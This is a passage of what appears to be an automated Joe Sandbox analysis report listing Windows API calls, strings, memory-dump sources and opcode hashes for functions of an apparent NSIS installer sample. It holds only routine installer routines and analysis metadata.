                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                  APIs
                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                  • wsprintfW.USER32 ref: 00404457
                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$@rD
                                                  • API String ID: 3540041739-1813061909
                                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":
                                                  • API String ID: 589700163-165019052
                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  • GlobalFree.KERNEL32(005D3510), ref: 00402387
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 3376005127-0
                                                  • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                  • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                  • String ID:
                                                  • API String ID: 2568930968-0
                                                  • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                  • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                  APIs
                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                  • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                  APIs
                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                  • API String ID: 1697273262-1764544995
                                                  • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                  • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404902
                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID: $@rD
                                                  • API String ID: 3748168415-881980237
                                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                  • String ID: CopyFiles "%s"->"%s"
                                                  • API String ID: 2577523808-3778932970
                                                  • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                  • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: lstrcatwsprintf
                                                  • String ID: %02x%c$...
                                                  • API String ID: 3065427908-1057055748
                                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                  • API String ID: 2266616436-4211696005
                                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00402100
                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749988184.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_66fd8d779da5e_EscortsRadios.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                  • String ID:
                                                  • API String ID: 1599320355-0
                                                  • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                  • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                  • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                  APIs
                                                    • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1749842551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1749817405.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749866804.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1749886770.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
